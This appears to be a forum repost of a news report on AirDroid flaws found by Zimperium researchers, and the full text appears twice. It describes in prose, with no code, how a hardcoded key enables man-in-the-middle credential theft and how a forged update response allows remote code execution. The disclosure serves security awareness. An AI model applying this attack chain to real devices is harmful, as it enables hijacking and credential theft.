- Jun 9, 2013
- 6,720
Multiple vulnerabilities have been found in AirDroid, which leaves millions vulnerable to man-in-the-middle (MITM) attacks, information leakage and remote hijacking.
AirDroid, a popular remote management tool for Android with an estimated user base of more than 50 million devices, relies on insecure communication channels to send the data used to authenticate the device to a statistics server, according to researchers at Zimperium's zLabs.
Such requests are encrypted; however, the encryption key is hardcoded inside the application itself (and thus known to an attacker). So, any malicious party on the same network of the target device could execute a MITM attack in order to obtain authentication credentials and impersonate the user for further requests on its behalf to the AirDroid API endpoints.
For instance, an attacker performing an MITM attack and redirecting HTTP traffic to a malicious transparent proxy could modify the response for the /phone/vncupgrade request, which is normally used by the application to check for add-ons and updates. By injecting a new update, the attacker can remotely execute custom code on the target device.
According to an analysis from Simone Margaritelle, a zLabs researcher, the flaws have been acknowledged by the vendor, but when a new update was released on Nov. 24, the software was still vulnerable. No patch has been made available.
Read More. Multiple Vulns in AirDroid Opens Millions to MITM, Hijacking
AirDroid, a popular remote management tool for Android with an estimated user base of more than 50 million devices, relies on insecure communication channels to send the data used to authenticate the device to a statistics server, according to researchers at Zimperium's zLabs.
Such requests are encrypted; however, the encryption key is hardcoded inside the application itself (and thus known to an attacker). So, any malicious party on the same network of the target device could execute a MITM attack in order to obtain authentication credentials and impersonate the user for further requests on its behalf to the AirDroid API endpoints.
For instance, an attacker performing an MITM attack and redirecting HTTP traffic to a malicious transparent proxy could modify the response for the /phone/vncupgrade request, which is normally used by the application to check for add-ons and updates. By injecting a new update, the attacker can remotely execute custom code on the target device.
According to an analysis from Simone Margaritelle, a zLabs researcher, the flaws have been acknowledged by the vendor, but when a new update was released on Nov. 24, the software was still vulnerable. No patch has been made available.
Read More. Multiple Vulns in AirDroid Opens Millions to MITM, Hijacking
